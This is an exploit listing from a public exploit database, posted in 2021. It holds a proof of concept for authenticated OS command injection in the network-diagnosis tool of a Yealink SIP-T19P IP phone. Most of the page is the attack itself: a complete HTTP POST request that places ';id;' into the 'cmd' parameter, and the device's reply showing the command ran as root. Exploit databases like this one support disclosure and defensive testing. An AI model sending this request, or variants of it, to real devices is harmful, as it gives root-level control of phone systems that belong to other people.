Exploit for YeaLink SIP-TXXXP 53.84.0.15 Command Injection

Name: Exploit for YeaLink SIP-TXXXP 53.84.0.15 Command Injection
Rating: 5 (316 reviews)

2021-11-11 | CVSS 7.1

## https://sploitus.com/exploit?id=PACKETSTORM:164934
# Exploit Title: YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated)  
# Date: 11-10-2021  
# Exploit Author: tahaafarooq  
# Vendor Homepage: https://www.yealink.com/  
# Version: 53.84.0.15  
# Tested on: YeaLink IP Phone SIP-T19P (Hadrware VOIP Phone)  
  
Description:   
  
Using Diagnostic tool from the Networking Tab to perform a Ping or Traceroute , to perform OS command injection  
  
POC:  
  
POST /servlet?m=mod_data&p=network-diagnosis&q=docmd&Rajax=0.890925468511929 HTTP/1.1  
Host: xxx.xxx.xxx.xxx  
Content-Length: 49  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36  
Content-Type: application/x-www-form-urlencoded  
Accept: */*  
Origin: http://xxx.xxx.xxx.xxx  
Referer: http://xxx.xxx.xxx.xxx/servlet?m=mod_data&p=network-diagnosis&q=load  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: JSESSIONID=9a83d24461329a130  
Connection: close  
  
cmd=; id;&token=1714636915c6acea98  
  
-------------------------------------------------  
  
HTTP/1.1 200 OK  
Content-Type: text/html  
Connection: close  
Date: Wed, 10 Nov 2021 14:20:23 GMT  
Server: embed httpd  
Content-Length: 82  
  
<html>  
<body>  
<div id="_RES_INFO_">  
uid=0(root) gid=0(root)  
</div>  
</body>  
</html>